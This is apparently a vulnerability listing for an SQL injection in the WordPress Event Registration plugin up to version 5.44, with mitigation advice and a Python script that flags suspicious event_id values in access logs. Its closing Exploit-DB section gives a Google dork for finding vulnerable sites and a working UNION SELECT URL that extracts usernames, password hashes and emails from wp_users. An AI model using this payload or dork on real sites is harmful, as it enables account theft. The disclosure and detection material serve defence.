Vendor: Wordpress Event Registration plugin
By: serk
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Wordpress Event Registration plugin
Affected Version From: <= 5.44
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2011

WordPress Event Registration plugin <= 5.44 SQL Injection Vulnerability

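The plugin's registration page (regevent_action=register) passes the 'event_id' URL parameter into a SQL query without sanitizing it. By appending a UNION SELECT to that parameter, an attacker can perform SQL injection and read the user_login, user_pass and user_email columns from the wp_users table.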

Mitigation:

Update to a version higher than 5.44 or apply a patch if available. Ensure user input is properly sanitized and validated.
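A detection check for the parameter abuse described above, as an added example that is not part of the original advisory: it scans web access-log lines for registration requests whose event_id is not a plain integer. The combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# A legitimate event_id is a short run of digits; anything else is reported.
VALID_EVENT_ID = re.compile(r"[0-9]{1,10}")


def suspicious_event_ids(log_lines):
    """Return (line_number, decoded_value) for each registration request
    (regevent_action=register) whose event_id is not a plain integer."""
    hits = []
    for lineno, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values, so %20 and + both become spaces.
        query = parse_qs(urlsplit(match.group("target")).query,
                         keep_blank_values=True)
        if "register" not in query.get("regevent_action", []):
            continue
        for value in query.get("event_id", []):
            if not VALID_EVENT_ID.fullmatch(value):
                hits.append((lineno, value))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Sep/2011:10:00:01 +0000] '
    '"GET /events-2/?regevent_action=register&event_id=2 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [09/Sep/2011:10:00:05 +0000] '
    '"GET /events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,2'
    ' HTTP/1.1" 200 5340',
    '198.51.100.7 - - [09/Sep/2011:10:00:09 +0000] '
    '"GET /events-2/?page=3 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [09/Sep/2011:10:00:12 +0000] '
    '"GET /events-2/?regevent_action=register&event_id=2+OR+1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for lineno, value in suspicious_event_ids(SAMPLE_LOG):
        print(f"line {lineno}: non-integer event_id {value!r}")
```

The same digits-only rule can be enforced in front of the site (for example in a WAF or reverse-proxy rule) while the listing shows no patch.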
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability
# Google Dork: "?regevent_action=register&event_id"
# Date: 2011-09-09
# Author: serk
# Vendor: http://edgetechweb.com/
# Software Link: https://wordpress.org/extend/plugins/events-registration/
# Version: 5.44


[ exploit ]

domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--